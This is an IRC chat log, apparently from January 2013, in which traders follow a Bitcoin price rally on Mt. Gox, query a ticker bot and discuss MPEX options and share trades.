06:54:26 ;;bids 13 Jan 24 06:54:27 There are currently 84574.66 bitcoins demanded at or over 13.0 USD, worth 1333995.0604 USD in total. Jan 24 06:54:32 ;;asks 99 Jan 24 06:54:34 There are currently 48697.266 bitcoins offered at or under 99.0 USD, worth 1393283.24391 USD in total. Jan 24 06:55:39 Thought this might happen when half the 18.01 bidwall disappeared Jan 24 06:55:40 :) Jan 24 06:55:42 ;;ticker Jan 24 06:55:43 BTCUSD ticker | Best bid: 18.30001, Best ask: 18.80000, Bid-ask spread: 0.49999, Last trade: 18.80000, 24 hour volume: 64138.46494394, 24 hour low: 16.80155, 24 hour high: 18.80000, 24 hour vwap: 17.51189 Jan 24 06:55:48 lol Jan 24 06:55:50 18.8 Jan 24 06:56:04 whoa Jan 24 06:56:06 .5 gap ?! Jan 24 06:56:20 ;;ticker Jan 24 06:56:24 BTCUSD ticker | Best bid: 18.30101, Best ask: 18.34768, Bid-ask spread: 0.04667, Last trade: 18.34768, 24 hour volume: 64163.91848394, 24 hour low: 16.80155, 24 hour high: 18.80000, 24 hour vwap: 17.51222 Jan 24 06:56:28 trades are still going off on clarkmoody Jan 24 06:56:36 Best bid: 18.30001, Best ask: 18.80000 Jan 24 06:56:39 this is to be preserved. Jan 24 06:56:44 ding ding ding ding Jan 24 06:56:49 I love it with the sound on Jan 24 06:57:11 that's because all the asks have been eaten Jan 24 06:57:14 That was exactly HALF the bid wall at 18.01 Jan 24 06:57:21 there is still another half Jan 24 06:57:22 now it's getting a real buying frenzy Jan 24 06:57:24 it looks like the rocket Jan 24 06:57:31 Rollercoaster time Jan 24 06:57:47 I hope it stabilize at 20 Jan 24 06:57:55 it might actually touch 50 Jan 24 06:58:01 eheheh Jan 24 06:58:06 20 is not a point of stability dude Jan 24 06:58:13 basically wtf, i can't add option lines as fast as the market moves Jan 24 06:58:15 that is a bifurcation point Jan 24 06:58:21 Bugpowder exactly Jan 24 06:58:25 it decides : 50s or teens Jan 24 06:58:25 well.... you can add them tomorrow Jan 24 06:58:30 i thought it would slow down since it is getting late Jan 24 06:58:30 Yup Jan 24 06:58:38 its morning in JAPAN Jan 24 06:58:41 this must be a differnet hemisphere Jan 24 06:58:44 its like 7am here. Jan 24 06:58:53 yeah its lunch in japan Jan 24 06:59:02 ;;asks 19 Jan 24 06:59:04 There are currently 2432.2725 bitcoins offered at or under 19.0 USD, worth 46000.0249847 USD in total. Jan 24 06:59:07 ;;bc,24hprc Jan 24 06:59:08 17.42 Jan 24 06:59:09 =/ Jan 24 06:59:12 come on Jan 24 06:59:16 17.42 Jan 24 06:59:16 holy cow Jan 24 06:59:30 50k usd to 19 ? Jan 24 06:59:38 It's just pure insanity... Jan 24 06:59:42 ahahaha am i glad i NEVER sold any btc. ever. Jan 24 06:59:44 Going crazy Jan 24 06:59:50 by now even ther 60 i bought at 15 each are clear. Jan 24 06:59:58 I just soldmy 20k S.DICE to buy calls... Jan 24 07:00:13 ;;asks 18.9 Jan 24 07:00:13 My BitVPS investment is fixed Jan 24 07:00:16 There are currently 612.68654 bitcoins offered at or under 18.9 USD, worth 11454.7319722 USD in total. Jan 24 07:00:16 all the coins are just being sucked up Jan 24 07:00:23 dude jesus god Jan 24 07:00:42 Can't cash it out... otherwise I'd have purchased more calls... Jan 24 07:01:22 18.01 wall just disappeared Jan 24 07:01:25 brace yourself Jan 24 07:01:28 ;;ticker Jan 24 07:01:29 BTCUSD ticker | Best bid: 18.53598, Best ask: 18.58998, Bid-ask spread: 0.05400, Last trade: 18.53598, 24 hour volume: 66488.29922688, 24 hour low: 16.80155, 24 hour high: 19.00000, 24 hour vwap: 17.56372 Jan 24 07:01:35 a green candle is coming Jan 24 07:01:58 It's going to be a bad month for MPOE if the frenzy doesn't stop soon. Jan 24 07:02:08 the thing that's most worrisome is that the volume is appalingly low. Jan 24 07:02:14 yes Jan 24 07:02:19 price movement like this w/o like 2-500k of btc traded ? Jan 24 07:02:22 it's not over then. Jan 24 07:02:26 ;;asks 25 Jan 24 07:02:27 There are currently 26176.486 bitcoins offered at or under 25.0 USD, worth 560171.712749 USD in total. Jan 24 07:02:31 ;;asks 200 Jan 24 07:02:32 ;;asks 50 Jan 24 07:02:33 There are currently 61802.524 bitcoins offered at or under 200.0 USD, worth 3080707.99888 USD in total. Jan 24 07:02:34 There are currently 41578.264 bitcoins offered at or under 50.0 USD, worth 1093314.0675 USD in total. Jan 24 07:02:41 it may get 50. Jan 24 07:02:41 There's like no asks Jan 24 07:02:47 Maybe Jan 24 07:02:48 yeah cause nobody wants to sell. Jan 24 07:02:54 basically the buyers were liek, o, no need to buy this. Jan 24 07:03:00 ;;asks 19.5 Jan 24 07:03:02 There are currently 3150.0805 bitcoins offered at or under 19.5 USD, worth 60569.8808214 USD in total. Jan 24 07:03:02 sellers were like, fuck this with reward halving im not selling Jan 24 07:03:15 and well... this actually reminds me of the chernobyl nuclear accident Jan 24 07:03:20 ;;asks 50 Jan 24 07:03:23 once the gas got eaten up it went critical. Jan 24 07:03:23 There are currently 41578.264 bitcoins offered at or under 50.0 USD, worth 1093314.0675 USD in total. Jan 24 07:03:34 ;;asks 30 Jan 24 07:03:35 There are currently 32352.721 bitcoins offered at or under 30.0 USD, worth 739001.016505 USD in total. Jan 24 07:03:59 [MPEX] [S.MPOE] 11152 @ 0.00060096 = 6.7019 BTC [+] Jan 24 07:07:45 [MPEX] [S.MPOE] 3676 @ 0.00059897 = 2.2018 BTC [-] Jan 24 07:08:33 ;;bids 18 Jan 24 07:08:35 There are currently 3303.8523 bitcoins demanded at or over 18.0 USD, worth 60034.255995 USD in total. Jan 24 07:09:23 ok, options 20-35 added Jan 24 07:09:31 bot will be quoting on the next tick Jan 24 07:09:44 if it fucks up i *may* stop trade and rollback, so fair warning Jan 24 07:10:23 As long as it's only past this moment... Jan 24 07:10:34 hm ? Jan 24 07:10:38 You can roll that back all you want Jan 24 07:10:55 a, strictly mpoe bot trades if it fucks up quoting. Jan 24 07:11:10 i had it tested past few days on test system but you know how it is... Jan 24 07:12:54 S.DICE up 15,000 Jan 24 07:12:54 I mean I already bought options prior to you rolling 20-35 out Jan 24 07:13:05 quit yer bitchin Jan 24 07:13:05 and I'm out of cash Jan 24 07:13:38 So I hardly care about that 20-35 options being rolled back Jan 24 07:14:02 MPOE only has asks over 21 no bids Jan 24 07:14:18 ok, bot is quoting fine. Jan 24 07:14:30 operation complete. Jan 24 07:14:41 here's to me hoping i won't be adding another 5000 db lines tomorrow lol Jan 24 07:14:52 [MPEX] [S.DICE] 400 @ 0.00558478 = 2.2339 BTC [-] Jan 24 07:15:00 short the P350Ns Jan 24 07:15:02 oh yeah Jan 24 07:15:14 Bugpowder yeah, it doesn't have itams. will get them after tomorrow. Jan 24 07:17:29 ;;ticker Jan 24 07:17:30 BTCUSD ticker | Best bid: 18.51620, Best ask: 18.66893, Bid-ask spread: 0.15273, Last trade: 18.66894, 24 hour volume: 68145.34624156, 24 hour low: 16.80155, 24 hour high: 19.00000, 24 hour vwap: 17.59925 Jan 24 07:20:26 I think that 19 is a bad print Jan 24 07:20:40 clark moody always barfs about 340 users Jan 24 07:20:45 damn Jan 24 07:20:59 ;;ticker Jan 24 07:21:00 BTCUSD ticker | Best bid: 18.70355, Best ask: 18.80000, Bid-ask spread: 0.09645, Last trade: 18.80000, 24 hour volume: 69541.42671625, 24 hour low: 16.80155, 24 hour high: 19.00000, 24 hour vwap: 17.62273 Jan 24 07:21:11 i don't think it is Jan 24 07:21:21 there was a run-up earlier Jan 24 07:21:29 it hit 18.80 Jan 24 07:21:34 and stopped Jan 24 07:21:39 http://bitcoincharts.com/charts/chart.png?width=940&m=mtgoxUSD&SubmitButton=Draw&r=2&i=&c=0&s=&e=&Prev=&Next=&t=S&b=&a1=&m1=10&a2=&m2=25&x=0&i1=&i2=&i3=&i4=&v=1&cv=0&ps=0&l=0&p=0& Jan 24 07:21:40 ;asks 19 Jan 24 07:21:42 charts has it too Jan 24 07:21:52 I was watching Jan 24 07:21:53 i think it was like that one time sdice sold for 18 Jan 24 07:21:58 that trade never happened Jan 24 07:22:06 Bugpowder maybe the feed isn't all that good. Jan 24 07:22:17 the candle formed Jan 24 07:22:25 and then the top got added later Jan 24 07:22:38 yah Jan 24 07:22:40 who knows Jan 24 07:22:49 but all the asks would ahve been cleaned out to 19 Jan 24 07:22:55 i would strongly suspect the feeds are shit actually. Jan 24 07:22:59 and they were only cleand to 18.80 Jan 24 07:23:01 since nobody involved even knows what a feed is. Jan 24 07:23:17 I can't tell what is happening without the dings Jan 24 07:23:36 funny how disorienting numbers alone can be, innit.\ Jan 24 07:24:04 Us this: http://www.bitcoincharts.com/markets/mtgoxUSD.html Jan 24 07:24:14 more accurate, refreshes often Jan 24 07:24:36 The askwall at 20 is under 20k BTC now Jan 24 07:24:48 Getting eaten Jan 24 07:25:03 or removed Jan 24 07:25:05 [MPEX] [S.MPOE] 13500 @ 0.00059897 = 8.0861 BTC [-] Jan 24 07:25:08 funny how that workds Jan 24 07:25:24 lol Jan 24 07:25:26 hey.... that order I placed 6 months ago to sell at 20 Jan 24 07:25:39 now that we are getting close, I'm gonna raise the price. Jan 24 07:25:58 oo Jan 24 07:26:01 I was wrong Jan 24 07:26:10 asks are clear to 19 Jan 24 07:26:27 big runs of <1BTC Jan 24 07:27:18 [MPEX] [O.BTCUSD.C170T] 1000 @ 0.06560548 = 65.6055 BTC [+] Jan 24 07:27:40 people buying calls =/ Jan 24 07:27:43 [MPEX] [O.BTCUSD.C180T] 1000 @ 0.05290351 = 52.9035 BTC [+] Jan 24 07:27:56 [MPEX] [O.BTCUSD.C190T] 1000 @ 0.05290351 = 52.9035 BTC [+] Jan 24 07:28:02 Not sure I'd have bought those C190T... Jan 24 07:28:03 [MPEX] [O.BTCUSD.C200T] 1000 @ 0.05290351 = 52.9035 BTC [+] Jan 24 07:28:08 or C200T... Jan 24 07:28:13 idiots Jan 24 07:28:19 hum Jan 24 07:28:21 fucking idiots Jan 24 07:28:24 seems like a gamble Jan 24 07:28:24 buy the C170T! Jan 24 07:28:28 dude Jan 24 07:28:32 They're the best priced! Jan 24 07:28:36 you pay the same Jan 24 07:28:45 for 18-20 Jan 24 07:28:51 Who bought those? Jan 24 07:28:54 did you really need it NOW Jan 24 07:28:59 rather than in 5 minutes Jan 24 07:29:10 the 160s are the best priced actually Jan 24 07:29:11 yeah good point. Jan 24 07:29:20 I bought 1800 C170T earlier... Jan 24 07:29:36 Instead of C160, they were better priced but I'd have gotten less Jan 24 07:29:40 I bot 1000 C160 last thursday on the first candle Jan 24 07:29:46 then 1400 more Jan 24 07:29:55 also short 400 P200s Jan 24 07:30:05 good call Jan 24 07:30:06 and some C140s Jan 24 07:30:15 that doesn't sound too bad. Jan 24 07:30:16 short (like 100 contracts) Jan 24 07:30:23 well Jan 24 07:30:25 wait short c140 ?! Jan 24 07:30:34 from early in the month Jan 24 07:30:41 eh Jan 24 07:30:45 I bot the 160s to hedge Jan 24 07:30:48 overhedged Jan 24 07:30:57 over over hedged Jan 24 07:31:00 speculated Jan 24 07:31:07 [MPEX] [O.BTCUSD.C170T] 1000 @ 0.07060548 = 70.6055 BTC [+] Jan 24 07:31:08 [MPEX] [O.BTCUSD.C180T] 1000 @ 0.05560548 = 55.6055 BTC [+] Jan 24 07:31:13 [MPEX] [O.BTCUSD.C190T] 1000 @ 0.05560548 = 55.6055 BTC [+] Jan 24 07:31:15 [MPEX] [O.BTCUSD.C200T] 1000 @ 0.05560548 = 55.6055 BTC [+] Jan 24 07:31:19 fucking tard Jan 24 07:31:30 I should short some 200s Jan 24 07:31:47 lol taking EVERYTHING Jan 24 07:31:56 Maybe he wants 50,000 contracts Jan 24 07:32:01 then it might make sense Jan 24 07:32:03 quite possible. Jan 24 07:32:08 If the guy has lots of BTC Jan 24 07:32:08 but will probably end in tears Jan 24 07:32:26 Namworld well if you look at it, the whole set is 200 btc. liek a sdice bet Jan 24 07:32:34 What if he also wants to buy lots of BTC with cash? Jan 24 07:32:57 ask wall down Jan 24 07:33:03 buy coming? Jan 24 07:33:09 lol... Jan 24 07:33:17 love it Jan 24 07:33:43 some HFT shit going on right now Jan 24 07:34:45 All this AND S.DICE is now up 15k. Jan 24 07:34:50 I fucking love today Jan 24 07:35:05 [MPEX] [O.BTCUSD.P330T] 1000 @ 0.87869415 = 878.6942 BTC Jan 24 07:35:07 [MPEX] [O.BTCUSD.P340T] 1000 @ 0.93571518 = 935.7152 BTC Jan 24 07:35:12 [MPEX] [O.BTCUSD.P350T] 1000 @ 0.99273622 = 992.7362 BTC Jan 24 07:35:14 [MPEX] [S.MPOE] 2698 @ 0.00060096 = 1.6214 BTC [+] Jan 24 07:35:14 [MPEX] [S.MPOE] 11802 @ 0.00060395 = 7.1278 BTC [+] Jan 24 07:35:16 oookay... Jan 24 07:35:17 oh Jan 24 07:35:22 now THATS what I'm talking about Jan 24 07:35:31 [MPEX] [O.BTCUSD.C200T] 5 @ 0.05560548 = 0.278 BTC [+] Jan 24 07:35:37 wish I could afford it Jan 24 07:36:04 MPBOR gonna have a high % this month Jan 24 07:36:07 lol from 2 to 12k btc exposure in 5 minutes. Jan 24 07:37:09 Was that someone buying puts? Jan 24 07:37:22 looks like selling. Jan 24 07:37:31 ;;ticker Jan 24 07:37:31 BTCUSD ticker | Best bid: 18.52651, Best ask: 18.66998, Bid-ask spread: 0.14347, Last trade: 18.68888, 24 hour volume: 68734.46498675, 24 hour low: 16.80155, 24 hour high: 19.00000, 24 hour vwap: 17.65469 Jan 24 07:38:08 hmm, selling Jan 24 07:39:08 If it goes down back even 2-3 BTC, that seller will bite his fingers Jan 24 07:39:19 yeah its pretty risky Jan 24 07:39:27 then again, it could go up too. Jan 24 07:39:53 Mine is too. If average price doesn't go and stay at 18 or over, I lose some or all my 100 BTC Jan 24 07:40:00 althought that's not too much Jan 24 07:40:02 [MPEX] [S.DICE] 88 @ 0.00575 = 0.506 BTC [+] Jan 24 07:40:04 [MPEX] [S.DICE] 1362 @ 0.00576956 = 7.8581 BTC [+] Jan 24 07:40:33 i guess it all depends if one major holder decides to take 18 and exit Jan 24 07:40:34 [MPEX] [O.BTCUSD.C170T] 1000 @ 0.07060548 = 70.6055 BTC [+] Jan 24 07:40:35 [MPEX] [O.BTCUSD.C180T] 1000 @ 0.05560548 = 55.6055 BTC [+] Jan 24 07:40:41 [MPEX] [O.BTCUSD.C190T] 1000 @ 0.05560548 = 55.6055 BTC [+] Jan 24 07:40:42 [MPEX] [O.BTCUSD.C200T] 1000 @ 0.05560548 = 55.6055 BTC [+] Jan 24 07:40:53 sorta like staring game Jan 24 07:41:04 [MPEX] [O.BTCUSD.P330T] 1000 @ 0.87549036 = 875.4904 BTC [-] Jan 24 07:41:06 [MPEX] [O.BTCUSD.P340T] 1000 @ 0.93241431 = 932.4143 BTC [-] Jan 24 07:41:07 [MPEX] [O.BTCUSD.P350T] 1000 @ 0.98933826 = 989.3383 BTC [-] Jan 24 07:41:31 [MPEX] [O.BTCUSD.C200T] 5 @ 0.05560548 = 0.278 BTC [+] Jan 24 07:42:28 this is certainly going to be record option volume month Jan 24 07:42:59 ;;ticker Jan 24 07:42:59 BTCUSD ticker | Best bid: 18.53259, Best ask: 18.65989, Bid-ask spread: 0.12730, Last trade: 18.53258, 24 hour volume: 71118.31556065, 24 hour low: 16.80155, 24 hour high: 19.00000, 24 hour vwap: 17.68502 Jan 24 07:43:08 boosh Jan 24 07:43:14 [MPEX] [S.MPOE] 11100 @ 0.00060395 = 6.7038 BTC [+] Jan 24 07:44:14 hm is it stabilizing at 18.5 ? Jan 24 07:44:28 looks like it Jan 24 07:44:37 not a bad price after all. Jan 24 07:44:48 sortof ridiculous to predict Jan 24 07:44:59 nota bad days work Jan 24 07:45:00 watch it flashcrash lol Jan 24 07:45:07 doh Jan 24 07:45:39 truth is tho, there's an asymmetry at work. if price goes up it's much easier to add btc to exchangesd to quench it Jan 24 07:45:48 than if it goes down and you have to send wires and wait for a week Jan 24 07:46:43 yah Jan 24 07:46:53 so upswings more likely to be accurate than downswings Jan 24 07:46:55 ;;ticker Jan 24 07:46:56 BTCUSD ticker | Best bid: 18.53261, Best ask: 18.55000, Bid-ask spread: 0.01739, Last trade: 18.59997, 24 hour volume: 71460.90656065, 24 hour low: 16.80155, 24 hour high: 19.00000, 24 hour vwap: 17.69050 Jan 24 07:46:59 takes a week now with wires? Jan 24 07:47:10 I usually got mine next day with gox Jan 24 07:47:13 Bugpowder i dunno i never did it myself. sorta guessing Jan 24 07:47:24 ever tried one the other way around btw? Jan 24 07:47:26 ACH was slow Jan 24 07:47:39 I was never able to withdraw successfully Jan 24 07:47:42 heh Jan 24 07:47:44 wires take ~3 days international Jan 24 07:47:47 also I couldn't deposit either Jan 24 07:47:56 from BoFA Jan 24 07:48:05 they wouldn't wire the money to that account Jan 24 07:48:06 dust-otc ya but that's in case ppl are half competent Jan 24 07:48:11 Bugpowder lol haters. Jan 24 07:48:24 Tangible was way better anyway Jan 24 07:48:42 and I changed my mind and rebought with the money I wanted to withdraw Jan 24 07:48:47 haha Jan 24 07:48:48 ;;ticker Jan 24 07:48:49 BTCUSD ticker | Best bid: 18.55000, Best ask: 18.63493, Bid-ask spread: 0.08493, Last trade: 18.55000, 24 hour volume: 71498.59656065, 24 hour low: 16.80155, 24 hour high: 19.00000, 24 hour vwap: 17.69095 Jan 24 07:48:50 a happy ending Jan 24 07:48:56 it's stopped is it Jan 24 07:50:27 nope, still lowering askwall Jan 24 07:50:47 ;;asks 20 Jan 24 07:50:48 There are currently 17129.008 bitcoins offered at or under 20.0 USD, worth 334360.435189 USD in total. Jan 24 07:50:58 [MPEX] [O.BTCUSD.C170T] 1000 @ 0.07060548 = 70.6055 BTC [+] Jan 24 07:51:00 [MPEX] [O.BTCUSD.C180T] 1000 @ 0.05560548 = 55.6055 BTC [+] Jan 24 07:51:00 [MPEX] [O.BTCUSD.C190T] 1000 @ 0.05560548 = 55.6055 BTC [+] Jan 24 07:51:02 [MPEX] [O.BTCUSD.C200T] 1000 @ 0.05560548 = 55.6055 BTC [+] Jan 24 07:51:35 CRACK HEAD Jan 24 07:51:40 BUY THE 160s Jan 24 07:52:04 better yet Jan 24 07:52:08 BUY THE COINS Jan 24 07:52:23 yah it's odd not the 160s Jan 24 07:52:33 at least we know which way the well funded buyer wants the price to move Jan 24 07:52:36 [MPEX] [O.BTCUSD.P330T] 1000 @ 0.87442485 = 874.4249 BTC [-] Jan 24 07:52:38 [MPEX] [O.BTCUSD.P340T] 1000 @ 0.93131651 = 931.3165 BTC [-] Jan 24 07:52:39 [MPEX] [O.BTCUSD.P350T] 1000 @ 0.98820817 = 988.2082 BTC [-] Jan 24 07:52:42 ;;ticker Jan 24 07:52:43 BTCUSD ticker | Best bid: 18.53503, Best ask: 18.59997, Bid-ask spread: 0.06494, Last trade: 18.53503, 24 hour volume: 71924.62261705, 24 hour low: 16.80155, 24 hour high: 19.00000, 24 hour vwap: 17.69668 Jan 24 07:52:50 heh. Jan 24 07:52:52 dude Jan 24 07:52:58 boys, i have a theory, and i doubt you'll like it. Jan 24 07:53:01 how much is the deposit on those? Jan 24 07:53:03 i think mpex quenched the rally. Jan 24 07:53:15 Bugpowder i dunno, 2.xk a pop ? Jan 24 07:53:44 basically people have been adding ~7-8k of notional btc exposure every 10 minutes Jan 24 07:53:45 so around 20,000 Jan 24 07:53:46 for the past half hour Jan 24 07:53:52 and since then... well... not much action on gox Jan 24 07:54:04 if these trades unwound there it'd have pushed volume over 100k i guess Jan 24 07:54:08 it comes in bursts Jan 24 07:54:28 not really a bad thing if you ask me Jan 24 07:54:39 something should slow those trades a bit when it gets like that Jan 24 07:54:45 jcpham i guess that's a point yeah Jan 24 07:54:58 it's like you said you can feed it coins and control the rise Jan 24 07:55:05 or maybe you can't anymore... Jan 24 07:55:17 today has been wild Jan 24 07:55:22 followed bya week of wild Jan 24 07:55:25 im not trading in the underlying market Jan 24 07:55:37 and even if i were, fuck me if i'd sell btc in a blowup Jan 24 07:55:41 o Jan 24 07:56:02 yah Jan 24 07:56:15 who wants to sell at 20 with a decent shot at 50 Jan 24 07:56:16 that's a recipe for going bankrupt Jan 24 07:56:58 anyway, if anyone cares max pain is like 17.8 or some shit Jan 24 07:57:24 nd what di we start the day at14? Jan 24 07:57:30 14.24 Jan 24 07:57:37 no Jan 24 07:57:40 17.0 ? Jan 24 07:57:42 something like that i where i started keeping track Jan 24 07:57:47 yeah 17 Jan 24 07:57:50 ya but was like lasdt week Jan 24 07:57:52 am i day behind Jan 24 07:58:01 i'm tired Jan 24 07:58:08 no more talk Jan 24 07:58:12 u are a week behind Jan 24 07:58:24 14 was last thurs Jan 24 07:58:35 my days are running together Jan 24 07:58:46 put down the pipe Jan 24 07:58:50 lol Jan 24 07:58:52 maybe that Jan 24 07:59:01 ;;bc;24hprc Jan 24 07:59:02 Error: "bc;24hprc" is not a valid command. Jan 24 07:59:06 ;;bc,24hprc Jan 24 07:59:06 dude. comma. Jan 24 07:59:07 17.63 Jan 24 07:59:33 it's thursday though, right Jan 24 07:59:37 or about tobe Jan 24 07:59:41 yea Jan 24 07:59:46 yeah. Jan 24 08:00:37 [MPEX] [O.BTCUSD.C170T] 1000 @ 0.07060548 = 70.6055 BTC [+] Jan 24 08:00:43 [MPEX] [O.BTCUSD.C180T] 1000 @ 0.05560548 = 55.6055 BTC [+] Jan 24 08:00:45 [MPEX] [O.BTCUSD.C190T] 1000 @ 0.05560548 = 55.6055 BTC [+] Jan 24 08:00:46 [MPEX] [O.BTCUSD.C200T] 1000 @ 0.05560548 = 55.6055 BTC [+] Jan 24 08:02:46 FFS Jan 24 08:03:05 [MPEX] [O.BTCUSD.C200T] 4 @ 0.05560548 = 0.2224 BTC [+] Jan 24 08:03:12 lol Jan 24 08:03:26 how can someone with so many coins be so bad at math? Jan 24 08:04:53 [MPEX] [O.BTCUSD.P330T] 1000 @ 0.8680571 = 868.0571 BTC [-] Jan 24 08:04:55 [MPEX] [O.BTCUSD.P340T] 1000 @ 0.9247558 = 924.7558 BTC [-] Jan 24 08:04:56 [MPEX] [O.BTCUSD.P350T] 1000 @ 0.9814545 = 981.4545 BTC [-] Jan 24 08:05:59 kakobrekla better close this http://bitbet.us/bet/152/btc-usd-at-mtgox-will-stay-below-18-35-and/ Jan 24 08:06:04 Maybe he just has so much coins, he just HAS to buy these calls/sell these puts Jan 24 08:06:11 or else it's too slow Jan 24 08:06:22 then he buys a large stack on MtGox Jan 24 08:06:24 and poof Jan 24 08:06:30 if he has 30,000BTC he can afford the 160s Jan 24 08:06:41 hmmm Jan 24 08:06:43 yeah Jan 24 08:06:58 if he has 30,000 BTC on MPEX Jan 24 08:07:00 He might want quantity over current value Jan 24 08:07:28 he could have 30,000 BTC worth of currency to make plays on Gox too Jan 24 08:07:36 shit Jan 24 08:07:45 I wish I was a player like that Jan 24 08:08:04 [HAVELOCK] [SDICE] 27 @ 0.56000001 = 15.12 BTC [-] Jan 24 08:10:15 or maybe he just has a diff price target in mind Jan 24 08:10:23 if say he thinks it really does go to 50 Jan 24 08:10:31 makes sense to spend 50 per call rather than 100 per call. Jan 24 08:10:35 even if the strike is 1 dollar less Jan 24 08:10:41 [MPEX] [S.MPOE] 2685 @ 0.00059897 = 1.6082 BTC [-] Jan 24 08:10:42 [MPEX] [S.MPOE] 13915 @ 0.00059725 = 8.3107 BTC [-] Jan 24 08:11:00 [MPEX] [O.BTCUSD.C170T] 1000 @ 0.07060548 = 70.6055 BTC [+] Jan 24 08:11:02 [MPEX] [O.BTCUSD.C180T] 1000 @ 0.05560548 = 55.6055 BTC [+] Jan 24 08:11:03 [MPEX] [O.BTCUSD.C190T] 1000 @ 0.05560548 = 55.6055 BTC [+] Jan 24 08:11:05 [MPEX] [O.BTCUSD.C200T] 1000 @ 0.05560548 = 55.6055 BTC [+] Jan 24 08:11:10 there he goes again... Jan 24 08:11:14 moreover, if he's for whatever reason short usd, like having taken in btc obligations and usd assets Jan 24 08:11:19 he HAS to insure against the 50 price Jan 24 08:11:36 and 5% per btc may seem like good insurance. Jan 24 08:11:52 [MPEX] [O.BTCUSD.P330T] 1000 @ 0.8680571 = 868.0571 BTC [-] Jan 24 08:11:54 [MPEX] [O.BTCUSD.P340T] 1000 @ 0.9247558 = 924.7558 BTC [-] Jan 24 08:11:56 [MPEX] [O.BTCUSD.P350T] 1000 @ 0.9814545 = 981.4545 BTC [-] Jan 24 08:12:03 um,m actually Jan 24 08:12:04 mircea, should be getting tempting for you to crash MtGox price... Jan 24 08:12:07 that's not even what the bot quotes Jan 24 08:12:17 hahaha dude actually put up walls on the Cs Jan 24 08:12:23 im starting to wonder if someones bot went on derp mode Jan 24 08:12:23 and walked away Jan 24 08:12:43 yeah Jan 24 08:12:46 eheh Jan 24 08:13:00 Namworld not rly. Jan 24 08:13:15 eh Jan 24 08:13:17 i kinda like this "s.mpoe worth 600k btc x 50 a pop" business Jan 24 08:13:18 wait, walls on the P330-350s? Jan 24 08:13:24 Bugpowder on the calls Jan 24 08:13:27 well that too Jan 24 08:13:43 But seems like MPOE will have a bad month. I think people mostly got calls Jan 24 08:13:58 possibly. Jan 24 08:13:59 Well, always the next month to earn it back if it doesn't go down soon. Jan 24 08:14:02 depends what will happen Jan 24 08:14:13 yeah Jan 24 08:14:14 MPOE averages at 12% return a month Jan 24 08:14:26 sometimes you gotta have a bad month Jan 24 08:14:30 ^^ that. Jan 24 08:14:39 indeed Jan 24 08:14:56 course i don't thinkl it's underwater atm Jan 24 08:15:01 ;;ticker Jan 24 08:15:02 BTCUSD ticker | Best bid: 18.50713, Best ask: 18.56289, Bid-ask spread: 0.05576, Last trade: 18.56299, 24 hour volume: 69393.03593511, 24 hour low: 16.80155, 24 hour high: 19.00000, 24 hour vwap: 17.73777 Jan 24 08:15:16 Bugpowder no bursts dude. rally died. Jan 24 08:15:25 ima go eat. Jan 24 08:15:41 ;;asks 20 Jan 24 08:15:43 There are currently 17210.139 bitcoins offered at or under 20.0 USD, worth 335788.636849 USD in total. Jan 24 08:15:56 bed time Jan 24 08:15:58 Ah well no movement Jan 24 08:16:01 don't crash on me Jan 24 08:16:11 I am happy with a churn at 18.50 Jan 24 08:16:14 i think everyone is just resetting their bids, etc. Jan 24 08:16:37 yeah, floor @ 18.50, but might kick back into gear later Jan 24 08:16:44 ;;calc 2.5/18.5 /.072 Jan 24 08:16:44 1.87687687688 Jan 24 08:16:54 heh Jan 24 08:18:07 we'll see :) Jan 24 08:20:44 [MPEX] [O.BTCUSD.C180T] 1000 @ 0.05560548 = 55.6055 BTC [+] Jan 24 08:20:45 [MPEX] [O.BTCUSD.C190T] 1000 @ 0.05560548 = 55.6055 BTC [+] Jan 24 08:20:51 [MPEX] [O.BTCUSD.C200T] 1000 @ 0.05560548 = 55.6055 BTC [+] Jan 24 08:22:09 [MPEX] [O.BTCUSD.P330T] 1000 @ 0.86700001 = 867 BTC [-] Jan 24 08:22:11 [MPEX] [O.BTCUSD.P340T] 1000 @ 0.92366667 = 923.6667 BTC [-] Jan 24 08:22:12 [MPEX] [O.BTCUSD.P350T] 1000 @ 0.98033334 = 980.3333 BTC [-] Jan 24 08:22:51 Well... Jan 24 08:22:56 lots of puts Jan 24 08:24:34 i think the 1695 wall @ 18.56 is about to fall here... Jan 24 08:25:09 err 18.59 Jan 24 08:29:06 [MPEX] [S.MPOE] 9950 @ 0.00059982 = 5.9682 BTC [+] Jan 24 08:29:06 [MPEX] [S.MPOE] 7789 @ 0.00060197 = 4.6887 BTC [+] Jan 24 08:30:11 [MPEX] [O.BTCUSD.C180T] 1000 @ 0.05560548 = 55.6055 BTC [+] Jan 24 08:30:13 [MPEX] [O.BTCUSD.C190T] 1000 @ 0.05560548 = 55.6055 BTC [+] Jan 24 08:30:14 [MPEX] [O.BTCUSD.C200T] 1000 @ 0.05560548 = 55.6055 BTC [+] Jan 24 08:32:13 http://www.zerohedge.com/news/2013-01-23/oldest-bank-world-plunges-halted-chairman-resigns-aftermath-latest-derivatives-fiasc Jan 24 08:32:17 meanwhile back at the ranch Jan 24 08:32:36 ;;ticker Jan 24 08:32:37 BTCUSD ticker | Best bid: 18.48982, Best ask: 18.65502, Bid-ask spread: 0.16520, Last trade: 18.65503, 24 hour volume: 69401.90200137, 24 hour low: 16.80155, 24 hour high: 19.00000, 24 hour vwap: 17.76489 Jan 24 08:32:43 [MPEX] [O.BTCUSD.P330T] 1000 @ 0.8659441 = 865.9441 BTC [-] Jan 24 08:32:45 [MPEX] [O.BTCUSD.P340T] 1000 @ 0.92257877 = 922.5788 BTC [-] Jan 24 08:32:46 [MPEX] [O.BTCUSD.P350T] 1000 @ 0.97921344 = 979.2134 BTC [-] Jan 24 08:37:15 [MPEX] [S.MPOE] 5810 @ 0.00059725 = 3.47 BTC [-] Jan 24 08:37:17 [MPEX] [S.MPOE] 10590 @ 0.00059639 = 6.3158 BTC [-] Jan 24 08:37:26 wall at 17 approaching 20k Jan 24 08:37:38 wall at 20 still around 17k Jan 24 08:37:48 but mostly nothing seems to be happening Jan 24 08:38:17 gotta reshuffle before the next leg up : Jan 24 08:38:21 :) Jan 24 08:39:14 [MPEX] [S.DICE] 1000 @ 0.00569482 = 5.6948 BTC [-] Jan 24 08:39:20 [MPEX] [S.DICE] 2100 @ 0.00568117 = 11.9305 BTC [-] Jan 24 08:39:22 [MPEX] [S.DICE] 1100 @ 0.00561477 = 6.1762 BTC [-] Jan 24 08:39:23 [MPEX] [S.DICE] 1700 @ 0.0054503 = 9.2655 BTC [-] Jan 24 08:39:25 [MPEX] [S.DICE] 148 @ 0.0054045 = 0.7999 BTC [-] Jan 24 08:39:26 [MPEX] [S.DICE] 500 @ 0.00536136 = 2.6807 